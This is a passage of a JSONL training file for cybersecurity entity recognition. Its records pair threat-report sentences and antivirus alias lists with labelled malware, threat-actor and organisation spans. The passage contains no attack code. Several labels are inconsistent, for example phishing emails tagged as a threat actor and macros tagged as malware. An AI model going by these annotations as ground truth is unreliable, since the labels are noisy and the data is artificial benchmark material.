used by other exploit kits.", "spans": {"MALWARE: Sundown": [[13, 20]], "MALWARE: exploit kits.": [[74, 87]]}, "info": {"id": "cyner2_train_005935", "source": "cyner2_train"}} {"text": "It uses a multi-stage installation process with specific checks at each point to identify if it is undergoing analysis by a security researcher.", "spans": {"ORGANIZATION: security researcher.": [[124, 144]]}, "info": {"id": "cyner2_train_005936", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.ZKD Trojan/W32.naKocTb.106496 Trojan.Mauvaise.SL1 Spyware.Infostealer.Fareit Spyware.LokiBot Trojan/Fareit.l Trojan.PWS.ZKD TSPY_LOKI.SMA Win32.Trojan.WisdomEyes.16070401.9500.9723 W32/Trojan.LAPN-1109 TSPY_LOKI.SMA Win.Trojan.naKocTb-6331389-1 Trojan.PWS.ZKD Trojan.PWS.ZKD Trojan.Win32.Stealer.eshrhl Trojan.PWS.Stealer.17779 Trojan.naKocTb.Win32.12 BehavesLike.Win32.Downloader.ch W32/Trojan2.PBTA Trojan.naKocTb.l PWS:Win32/Primarypass.A Trojan.PWS.ZKD Troj.W32.naKocTb.tnB5 Trojan/Win32.naKocTb.C1575888 Trojan.naKocTb Trj/GdSda.A Trojan.Nakoctb Win32/PSW.Fareit.L Trojan-Spy.Dyzap Win32/Trojan.15d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005938", "source": "cyner2_train"}} {"text": "Starting in November 2022, Morphisec has been tracking an advanced info stealer we have named SYS01 stealer. 
SYS01 stealer uses similar lures and loading techniques to another information stealer recently dubbed S1deload by the Bitdefender group, but the actual payload stealer is different.", "spans": {"ORGANIZATION: Morphisec": [[27, 36]], "MALWARE: advanced info stealer": [[58, 79]], "MALWARE: SYS01 stealer.": [[94, 108]], "MALWARE: SYS01 stealer": [[109, 122]], "MALWARE: S1deload": [[212, 220]], "ORGANIZATION: the Bitdefender group,": [[224, 246]], "MALWARE: payload stealer": [[262, 277]]}, "info": {"id": "cyner2_train_005939", "source": "cyner2_train"}} {"text": "Article primarily covering activity from 2016.", "spans": {}, "info": {"id": "cyner2_train_005940", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutoHotkeyA.Worm Virus.Win32.Sality!O Backdoor.Vercuser.B4 Worm.AutoHotKey.Win32.37 Trojan.Heur.uquarfYBWDlih Win32/Tnega.NCdVJJ Win.Trojan.Ag-13 Worm.Win32.AutoHotKey.a Trojan.Win32.AutoHotKey.cmxqxy Win32.HLLW.Autoruner1.26246 BehavesLike.Win32.Virut.fc Backdoor.Win32.Vercuser Worm:Win32/Vercuser.B Trojan/Win32.Hupigon.R57102 Trj/CI.A Win32/Vercuser.B Win32.Worm.Autohotkey.Dzjb Worm.AutoHotKey!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005941", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pirril.B5 Trojan/BHO.aisa TROJ_PIRRIL.SMI Win.Trojan.Pirril-7 Trojan.Win32.BHO.czvu Trojan.Win32.BHO.btaog Troj.W32.Bho!c Backdoor.Win32.Ripinip.a TrojWare.Win32.Pirril.smi Win32.HLLW.Riplip.10 Trojan.BHO.Win32.9746 TROJ_PIRRIL.SMI BehavesLike.Win32.Pirril.mm Adware/BHO.bmy Trojan.Graftor.D453B Trojan.Win32.Z.Bho.90112 Trojan.Win32.BHO.czvu Pirril.a Trojan.BHO Trojan.Win32.BHO W32/BHO.AJZ!tr Backdoor.Win32.Ripinip.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005942", "source": "cyner2_train"}} {"text": "Additionally, others have been referring to the group responsible for the OilRig campaign itself as the OilRig group as well.", "spans": {"THREAT_ACTOR: the group": [[44, 
53]], "THREAT_ACTOR: the OilRig campaign": [[70, 89]], "THREAT_ACTOR: the OilRig group": [[100, 116]]}, "info": {"id": "cyner2_train_005943", "source": "cyner2_train"}} {"text": "Expanded with indicators generated by Alienvault Labs", "spans": {"ORGANIZATION: Alienvault Labs": [[38, 53]]}, "info": {"id": "cyner2_train_005944", "source": "cyner2_train"}} {"text": "What 's new ? WolfRAT is based on a previously leaked malware named DenDroid .", "spans": {"MALWARE: WolfRAT": [[14, 21]], "MALWARE: DenDroid": [[68, 76]]}, "info": {"id": "cyner2_train_005946", "source": "cyner2_train"}} {"text": "However, Buckeye's focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.", "spans": {"THREAT_ACTOR: Buckeye's": [[9, 18]], "THREAT_ACTOR: group": [[75, 80]], "ORGANIZATION: political entities": [[100, 118]]}, "info": {"id": "cyner2_train_005947", "source": "cyner2_train"}} {"text": "F5 research conducted in March 2017 followed 153 Marcher configuration files to uncover target and activity trends in the worldwide attack campaigns.", "spans": {"ORGANIZATION: F5 research": [[0, 11]], "MALWARE: Marcher": [[49, 56]], "THREAT_ACTOR: the worldwide attack campaigns.": [[118, 149]]}, "info": {"id": "cyner2_train_005948", "source": "cyner2_train"}} {"text": "The Word document initiated the same multiple-stage infection process as the file from the Hybrid Analysis report we previously discovered and allowed us to reconstruct a more complete infection process.", "spans": {}, "info": {"id": "cyner2_train_005949", "source": "cyner2_train"}} {"text": "SpiderLabs has uncovered a new strain of malware that can steal cryptocurrencies and other digital currencies.", "spans": {"ORGANIZATION: SpiderLabs": [[0, 10]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_005950", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Protoride.59392 W32.Protoride.E Worm.RAHack W32/Protoride2.worm 
Trojan.Win32.Protoride.fsfk W32/Protoride.C.unp W32.Protoride.Worm Win32/Protoride.E Worm.Protoride.F Worm.Win32.Protoride.59392[h] W32.W.Protoride.e!c Worm.Win32.Protoride.E BackDoor.IRC.Cirilico Worm.Protoride.Win32.7 BehavesLike.Win32.SpyLydra.qc W32/Protoride.ZUZR-8900 Worm/Protoride.e WORM/Protoride.E.2 Worm[Net]/Win32.Protoride Worm/Win32.IRCBot Worm:Win32/Protoride.F Win32/Protoride.F W32/Protoride.worm BScope.Trojan.IRCbot Win32.Worm-net.Protoride.Lorr Net-Worm.Win32.Protoride", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005951", "source": "cyner2_train"}} {"text": "Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.", "spans": {"ORGANIZATION: Microsoft": [[49, 58]], "SYSTEM: EPS,": [[68, 72]], "ORGANIZATION: FireEye": [[73, 80]], "VULNERABILITY: unknown vulnerability": [[99, 120]], "SYSTEM: EPS.": [[124, 128]]}, "info": {"id": "cyner2_train_005953", "source": "cyner2_train"}} {"text": "In the most recent versions, APT19 added an application whitelisting bypass to the macro-enabled Microsoft Excel XLSM documents.", "spans": {"THREAT_ACTOR: APT19": [[29, 34]]}, "info": {"id": "cyner2_train_005954", "source": "cyner2_train"}} {"text": "The NCSC has observed these tools being used by the Turla group to maintain persistent network access and to conduct network operations.", "spans": {"ORGANIZATION: The NCSC": [[0, 8]], "MALWARE: tools": [[28, 33]], "ORGANIZATION: the Turla group": [[48, 63]], "SYSTEM: network access": [[87, 101]]}, "info": {"id": "cyner2_train_005955", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Cerber.B NSIS/ObfusRansom.f Ransom_Enestaller.R00EC0CL417 Packed.NSISPacker!g4 Ransom_Enestaller.R00EC0CL417 Trojan.Nsis.Zerber.emhumo BehavesLike.Win32.ObfusRansom.dc Ransom.Cerber/Variant Trojan/Win32.Cerber.R196343 Ransom.Cerber W32/Injector.UQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_005956", "source": "cyner2_train"}} {"text": "A file called x32dbg.exe was used to sideload a malicious DLL we identified as a variant of PlugX.", "spans": {"MALWARE: variant": [[81, 88]], "MALWARE: PlugX.": [[92, 98]]}, "info": {"id": "cyner2_train_005957", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.Elzob.D5035 Win32.Trojan.WisdomEyes.16070401.9500.9799 W32/Trojan2.HUBT Win32/Tnega.RA Trojan.Cebaek BehavesLike.Win32.PWSOnlineGames.pm W32/Trojan.JRGD-8081 PWS:Win32/Jomloon.E BScope.Trojan-Downloader.6707 W32/PWS_y.XR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005958", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.WinShell.12832 Backdoor.WinShell.I W32/Backdoor.LOY Backdoor.Winshell.50 W32/Winshell.AIC Backdoor.Win32.WinShell.50 BackDoor.WinShell.74 Backdoor.Win32.WinShell.50!IK Backdoor/WinShell.50 Backdoor:Win32/Winshell.G Backdoor.Win32.A.WinShell.203004.A W32/Backdoor.LOY Win-Trojan/Winshell.54178 Backdoor.Win32.WinShell.50 Win32/WinShell.50 Backdoor.WinShell Backdoor.Win32.WinShell.50 W32/Winshell.A!tr.bdr Bck/Winshell.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005959", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB.Win32.23241 Trojan/VB.ymg Win32.Trojan.WisdomEyes.16070401.9500.9965 TROJ_VB.JNH Worm.Win32.VBNA.b Trojan.Win32.VB.edhhbs Trojan.Win32.A.VB.206336[UPX] Backdoor.W32.VB.l0cp TrojWare.Win32.Trojan.VB.~Ymg Trojan.VbCrypt.68 TROJ_VB.JNH BehavesLike.Win32.Rontokbro.lc Trojan.Win32.Sopcol Worm.VBNA.skk Trojan:Win32/Sopcol.A Worm/Win32.VBNA Trojan.Jaiko.DF2A Worm.Win32.VBNA.b Trojan:Win32/Sopcol.A Trojan/Win32.Xema.C33567 SScope.Trojan.VBO.0286 Trojan.VB!6EP+kawqBsw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005963", "source": "cyner2_train"}} {"text": "Black Vine's targets include gas turbine manufacturers, large aerospace and aviation 
companies, healthcare providers, and more.", "spans": {"THREAT_ACTOR: Black Vine's": [[0, 12]], "ORGANIZATION: gas turbine manufacturers, large aerospace": [[29, 71]], "ORGANIZATION: aviation companies, healthcare providers,": [[76, 117]]}, "info": {"id": "cyner2_train_005964", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WinfileH.Worm Email-Worm.Win32.VB!O Worm.Wukill.AM3 Trojan.TempCom Win32.Worm.VB.sg W32/VB.KL W32.Traxg@mm Win32/Traxg.B WORM_VB.F Win.Worm.Traxg-4 Trojan.Win32.Scar.avxe Trojan.Win32.Scar.bjfnz Troj.W32.Scar!c Trojan.Win32.Rays.tzs Win32.HLLM.Utenti Worm.Rays.Win32.3 WORM_VB.F BehavesLike.Win32.Autorun.cz W32/VB.CWJD-9096 I-Worm/Wukill.j W32.Email-worm.Win32.Rays WORM/Traxgy.B Worm[Email]/Win32.VB Worm.Rays.8192 I-Worm.Win32.Traxg.57344 Trojan.Win32.Scar.avxe Worm:Win32/Wukill.G@mm Worm/Win32.Traxg.R2565 W32/Nethood.worm SScope.Trojan.VBO.0362 I-Worm.VB.NBB Win32/VB.NBB I-Worm.Rays.K W32/Vinet.A.worm Trojan.Win32.VBCode.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005965", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Tufei503.PE Win32.Tufik.A Virus.Win32.Tufik!O W32.Tufik.A Troj.GameThief.W32.Magania.leKk PE_TUFIK.B Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Tufik.A W32.Tufik Win32/Tufik.A PE_TUFIK.B Win.Trojan.Tufik-3 Win32.Tufik.A Packed.Win32.Krap.hm Win32.Tufik.A Virus.Win32.Tufik.cdpn Win32.Tufik.A Virus.Win32.Virut.Ce VBS.Dropper.128 Virus.Tufik.Win32.2 BehavesLike.Win32.PWSZbot.dh Trojan-Dropper.Win32.Wlord W32/Tufik.A Win32/Tufei.a W32/Tufik.J Win32.Tufik.a.13824 Win32.Tufik.A Packed.Win32.Krap.hm Worm:Win32/Tufik.A Win32.Tufik.A Virus.Win32.Tufei.13798 Worm.Qakbot W32/Tufei.A Trojan.Zbot Win32/Tufik.A Virus.Win32.Tufik.cb Win32.Perez.B Win32/Sorter.AutoVirus.VMKUKU.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005967", "source": "cyner2_train"}} {"text": "In our initial two-part blog series on FIN7 we covered network activity 
patterns, payloads, and defensive best practices.", "spans": {"THREAT_ACTOR: FIN7": [[39, 43]], "MALWARE: payloads,": [[82, 91]]}, "info": {"id": "cyner2_train_005968", "source": "cyner2_train"}} {"text": "hackers, leaving most areas of western Ukraine in the dark.", "spans": {"THREAT_ACTOR: hackers,": [[0, 8]]}, "info": {"id": "cyner2_train_005969", "source": "cyner2_train"}} {"text": "The threat actors behind Operation Tropic Trooper—we named specifically for its choice of targets—aim to steal highly classified information from several Taiwanese government ministries and heavy industries as well as the Philippine military.", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "THREAT_ACTOR: Operation Tropic Trooper—we": [[25, 52]], "ORGANIZATION: Taiwanese government ministries": [[154, 185]], "ORGANIZATION: heavy industries": [[190, 206]], "ORGANIZATION: Philippine military.": [[222, 242]]}, "info": {"id": "cyner2_train_005970", "source": "cyner2_train"}} {"text": "In addition to using PlugX and Poison Ivy PIVY, both known to be used by the group, they also used a new Trojan called ChChes by the Japan Computer Emergency Response Team Coordination Center JPCERT.", "spans": {"MALWARE: PlugX": [[21, 26]], "MALWARE: Poison Ivy PIVY,": [[31, 47]], "MALWARE: Trojan": [[105, 111]], "MALWARE: ChChes": [[119, 125]], "ORGANIZATION: the Japan Computer Emergency Response Team Coordination Center JPCERT.": [[129, 199]]}, "info": {"id": "cyner2_train_005972", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Quolko.A Trojan/Dropper.Drooptroop.ixt Trojan.Heur.JP.dmGfaeisekjc Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Bamital.I Win32/Droplet.LNE TROJ_KRYPTIK.SMY Trojan.Win32.Drooptroop.cxmbc Troj.GameThief.W32.OnLineGames.lkrK Backdoor.Win32.Shiz.A Trojan.Packed.21232 Dropper.Drooptroop.Win32.3912 TROJ_KRYPTIK.SMY BehavesLike.Win32.Ramnit.qc Trojan.Win32.Bulta W32/Bamital.I TrojanDropper.Drooptroop.cuc Worm:Win32/Yahos.A Trojan/Win32.Zbot.C168741 
Trojan.SB.01742 Win32.Trojan-dropper.Drooptroop.Wlzg Trojan.DR.Drooptroop!S4bmnA2fbPM W32/Drooptroop.SMY!tr Win32/Trojan.98f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005974", "source": "cyner2_train"}} {"text": "A backdoor also known as: AIT:Trojan.Autoit.CLU Win32.Trojan.WisdomEyes.16070401.9500.9768 AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU Trojan.Autoit.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005978", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Nosok!O Trojan/Nosok.dez Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.AMZR Trojan.Win32.Nosok.ignra Worm.Win32.A.AutoRun.78881 Trojan.DownLoader11.6990 Trojan.Nosok.Win32.81 BehavesLike.Win32.VirRansom.dc W32/Worm.SMLT-2477 Trojan/Nosok.df Trojan.Razy.D2AA1A Trojan/Win32.Xema.C90213 Worm.AutoRun!dge3lshCyjI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005981", "source": "cyner2_train"}} {"text": "The Threat Actor would then craft specific spear phishing emails to direct their targets to visit the malicious web sites and open the malware laden documents.", "spans": {"THREAT_ACTOR: The Threat Actor": [[0, 16]], "THREAT_ACTOR: spear phishing emails": [[43, 64]], "MALWARE: the malware laden documents.": [[131, 159]]}, "info": {"id": "cyner2_train_005986", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Scar Win32.Trojan.WisdomEyes.16070401.9500.9573 Trojan.Win32.Scarsi.apft Trojan.Win32.Inject.ewxioq Trojan.MulDrop6.38561 BehavesLike.Win32.AdwareSearchProtect.jc TR/Inject.oiycd TrojanSpy:MSIL/CoinStealer.C!bit Trojan.Win32.Scarsi.apft Trojan/Win32.Scarsi.C2337044 Trj/CI.A Win32.Trojan.Scarsi.Dkx Trojan.Win32.Injector W32/Injector.DUUK!tr Win32/Trojan.f68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005987", "source": "cyner2_train"}} {"text": "In the second half of 2016, ESET researchers 
identified a unique malicious toolset that was used in targeted cyberattacks against high-value targets in the Ukrainian financial sector.", "spans": {"ORGANIZATION: ESET researchers": [[28, 44]], "MALWARE: malicious toolset": [[65, 82]], "ORGANIZATION: the Ukrainian financial sector.": [[152, 183]]}, "info": {"id": "cyner2_train_005988", "source": "cyner2_train"}} {"text": "In this blog we will detail our discovery of the next two versions of MM Core, namely BigBoss 2.2-LNK and SillyGoose 2.3-LNK.", "spans": {"MALWARE: versions": [[58, 66]], "MALWARE: MM Core,": [[70, 78]], "MALWARE: BigBoss 2.2-LNK": [[86, 101]], "MALWARE: SillyGoose 2.3-LNK.": [[106, 125]]}, "info": {"id": "cyner2_train_005991", "source": "cyner2_train"}} {"text": "During the preparation of the IT threat evolution Q2 2017 report I found several common Trojans in the Top 20 mobile malware programs list that were stealing money from users using WAP-billing – a form of mobile payment that charges costs directly to the user's mobile phone bill so they don't need to register a card or set up a user-name and password.", "spans": {"ORGANIZATION: the IT threat evolution": [[26, 49]], "MALWARE: Trojans": [[88, 95]], "MALWARE: mobile malware": [[110, 124]], "ORGANIZATION: users": [[169, 174]], "SYSTEM: user's mobile phone": [[255, 274]]}, "info": {"id": "cyner2_train_005992", "source": "cyner2_train"}} {"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is “ irc.freenode.net ” ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is “ ISeency ” ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ 
broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated .", "spans": {}, "info": {"id": "cyner2_train_005993", "source": "cyner2_train"}} {"text": "This post takes a look at a new banking malware that has, so far, been targeting financial institutions in Latin America—specifically, Mexico and Peru.", "spans": {"MALWARE: new banking": [[28, 39]], "ORGANIZATION: financial institutions": [[81, 103]]}, "info": {"id": "cyner2_train_005994", "source": "cyner2_train"}} {"text": "On June 9th, 2017 Morphisec Lab published a blog post detailing a new infection vector technique using an RTF document containing an embedded JavaScript OLE object.", "spans": {"ORGANIZATION: Morphisec Lab": [[18, 31]]}, "info": {"id": "cyner2_train_005995", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.JS.QAI PDF.Trojan.4250 JS.Exploit.Pdfka.jr JS/Exploit.Pdfka.QNP JS_PIDIEF.SMQ Exploit.JS.Pdfka.axt Trojan.JS.QAI Exploit.Script.Pdfka.otnl Trojan.JS.QAI Exploit.JS.Pdfka.aqn Trojan.JS.QAI JS_PIDIEF.SMQ BehavesLike.PDF.Exploit.zb EXP/Pidief.hcb Trojan[Exploit]/JS.Pdfka.axt Trojan.JS.QAI Exploit.JS.Pdfka.axt Exploit.JS.Pdfka.axt Exploit.JS.Pdfka JS/Pdfka.AABY!exploit virus.js.pdfjs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005996", "source": "cyner2_train"}} {"text": "Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool RAT that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system 
administration, traffic relaying, and more.", "spans": {"ORGANIZATION: individuals": [[9, 20]], "MALWARE: macros": [[34, 40]], "MALWARE: Poison Ivy,": [[108, 119]], "MALWARE: popular remote access tool RAT": [[122, 152]]}, "info": {"id": "cyner2_train_005997", "source": "cyner2_train"}} {"text": "A backdoor also known as: PDF/Phish.AGU Troj.Downloader.Pdf!c PDF/Phish.AGU Trojan.PDF.Phishing Win32/Trojan.Downloader.8a8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005998", "source": "cyner2_train"}} {"text": "Sundown remained highly vigilant and the subdomains in use were recycled quickly to help in avoiding detection.", "spans": {"MALWARE: Sundown": [[0, 7]]}, "info": {"id": "cyner2_train_005999", "source": "cyner2_train"}} {"text": "Dridex has drastically reduced in volume throughout 2016.Actors are now appearing to prefer crypto-ransomware such as Locky over the infamous banking trojan.However, Dridex is still being actively developed.", "spans": {"MALWARE: Dridex": [[0, 6], [166, 172]], "MALWARE: crypto-ransomware": [[92, 109]], "MALWARE: Locky": [[118, 123]], "MALWARE: banking": [[142, 149]]}, "info": {"id": "cyner2_train_006000", "source": "cyner2_train"}} {"text": "From September 2016 through late November 2016, a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand, including a utility organization.", "spans": {"THREAT_ACTOR: a threat actor group": [[48, 68]], "MALWARE: the Trochilus RAT": [[79, 96]], "MALWARE: RAT": [[118, 121]], "MALWARE: MoonWind": [[134, 142]], "ORGANIZATION: organizations": [[153, 166]], "ORGANIZATION: utility organization.": [[192, 213]]}, "info": {"id": "cyner2_train_006005", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Killav Downloader.Betload.Win32.51 Win32.Trojan.WisdomEyes.16070401.9500.9783 Trojan.Win32.KillAV.me Troj.W32.SchoolGirl.tnx1 Trojan.Win32.Killav BehavesLike.Win32.Downloader.lh 
Trojan.Win32.KillAV.me Trojan.Win32.Killav BAT/KillAV.NCO Win32.Trojan.Killav.Pgwh PUA.Bat.Hoax W32/KillAV.ME!tr Win32/Trojan.ba9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006006", "source": "cyner2_train"}} {"text": "The group has been in operation since at least 2011 but has re-emerged over the past two years from a quiet period following exposure by Symantec and a number of other researchers in 2014.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: Symantec": [[137, 145]], "ORGANIZATION: researchers": [[168, 179]]}, "info": {"id": "cyner2_train_006007", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bamital.EC Trojan/PornoBlocker.jhw W32/PornoBlocker.N Win32/PornoBlocker.EW TROJ_KRYPTK.SM11 Trojan-Ransom.Win32.Gimemo.cpe Trojan.Win32.A.PornoBlocker.59904 Trojan-Ransom.Win32.PornoBlocker!IK TrojWare.Win32.Bamital.FA Trojan.Hosts.4025 TROJ_KRYPTK.SM11 Trojan/PornoBlocker.aba TrojanDropper:Win32/Bamital.I Hoax.PornoBlocker.jhw Downloader.Lofog Win32/Bamital.FA Trojan-Ransom.Win32.PornoBlocker W32/Bamital.FA!tr Bck/Qbot.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006008", "source": "cyner2_train"}} {"text": "The user would have to then open the downloaded executable in order to infect their computer.", "spans": {"MALWARE: downloaded executable": [[37, 58]], "SYSTEM: computer.": [[84, 93]]}, "info": {"id": "cyner2_train_006009", "source": "cyner2_train"}} {"text": "The first sample found was submitted 7 months ago.", "spans": {}, "info": {"id": "cyner2_train_006010", "source": "cyner2_train"}} {"text": "A backdoor also known as: Swrort.d Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Swrort-5710536-0 Packed.Win32.BDF.a Trojan.Win32.Shellcode.ewfvwj TrojWare.Win32.Rozena.A Trojan.Swrort.1 Swrort.d Trojan:Win32/Meterpreter.A Packed.Win32.BDF.a W32/Swrort.C!tr Win32/Trojan.6bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006012", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Downldr2.EOVV Infostealer.Bancos Trojan-Downloader.Win32.Banload.aadik Trojan.Win32.Banload.bmdsil Trojan.DownLoad.22103 BehavesLike.Win32.Pate.dc W32/Downloader.SIUT-2288 TrojanDownloader.Banload.bhyz Troj.Downloader.W32.Banload.aadik!c Trojan-Downloader.Win32.Banload.aadik Trojan:Win32/Pitke.A Trojan/Win32.Banker.R143357 Win32.Trojan-downloader.Banload.Ebrq Trojan.Win32.Scar W32/DelpBanc.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006015", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Runar.53248 Backdoor/Runar.b W32/Backdoor.LCQ Backdoor.Trojan Win.Trojan.Runar-2 Backdoor.Win32.Runar.b Trojan.Win32.Runar.dmmx Backdoor.Win32.A.Runar.53248 Win32.Backdoor.Runar.duq Backdoor.Win32.Runar.b BackDoor.Hiper Backdoor.Runar.Win32.6 W32/Backdoor.WJPY-2871 BDS/Runar.B Trojan[Backdoor]/Win32.Runar Backdoor.W32.Runar.b!c Backdoor.Win32.Runar.b Backdoor:Win32/Runar.B Backdoor.Runar Backdoor.Runar!lU3ZFWcAWmA W32/Runar.B!tr.bdr Win32/Backdoor.d80", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006016", "source": "cyner2_train"}} {"text": "It did not take long for attackers to repackage this PoC and use it in attacks in the wild.", "spans": {"THREAT_ACTOR: attackers": [[25, 34]], "MALWARE: PoC": [[53, 56]]}, "info": {"id": "cyner2_train_006018", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom:Win32/Jaffrans.A!rsm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006020", "source": "cyner2_train"}} {"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk 
/storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course of our analysis , we also found samples sharing code with the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server .", "spans": {"MALWARE: ViceLeaker": [[491, 501]]}, "info": {"id": "cyner2_train_006022", "source": "cyner2_train"}} {"text": "The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks.", "spans": {"THREAT_ACTOR: The Darkhotel APT": [[0, 17]], "THREAT_ACTOR: spearphish": [[31, 41]], "MALWARE: botnet": [[116, 122]]}, "info": {"id": "cyner2_train_006023", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Mangit BKDR_MANGIT.SM W32/Adware5.BH BKDR_MANGIT.SM Trojan-Banker.Win32.Banbra.tolm Trojan.Win32.Banker1.eeflxo Trojan.PWS.Banker1.21424 Dropper.DapatoCRTD.Win32.29 W32/Adware.ZANB-0757 Trojan.Banker.19 Trojan-Banker.Win32.Banbra.tolm Backdoor:Win32/Mangit.A Trj/GdSda.A Win32.Trojan-banker.Banbra.Syia Trojan.PWS.Banbra!KoDGdYjSbaA Trojan-Downloader.Win32.Delf Win32/Trojan.5ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006025", "source": "cyner2_train"}} {"text": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: undisclosed vulnerability.": [[109, 135]]}, "info": {"id": "cyner2_train_006026", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Worm.Rikihaki.A4 Trojan.Razy.D23D4 WORM_RIKIHAKI.SM Trojan.Tinba WORM_RIKIHAKI.SM Trojan.Win32.KillFiles.didhhl Trojan.KillFiles.14550 BehavesLike.Win32.Worm.gh TR/ATRAPS.sxzgc Worm:Win32/Rikihaki.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006028", "source": 
"cyner2_train"}} {"text": "This could change once the trojan spy has fully developed.", "spans": {}, "info": {"id": "cyner2_train_006029", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/VBTroj.CYJD Trojan.Win32.VB!IK Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006031", "source": "cyner2_train"}} {"text": "Most of the attacks begin with a phone call from a UK phone number, with attackers speaking in either English or Farsi.", "spans": {}, "info": {"id": "cyner2_train_006035", "source": "cyner2_train"}} {"text": "While some ransomware i.e. Chimera give bogus threats about stealing and releasing private files, there are other malware families that in fact have made this possibility a reality.", "spans": {"MALWARE: ransomware": [[11, 21]], "MALWARE: Chimera": [[27, 34]], "MALWARE: malware families": [[114, 130]]}, "info": {"id": "cyner2_train_006037", "source": "cyner2_train"}} {"text": "Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "MALWARE: backdoor Trojan": [[37, 52]], 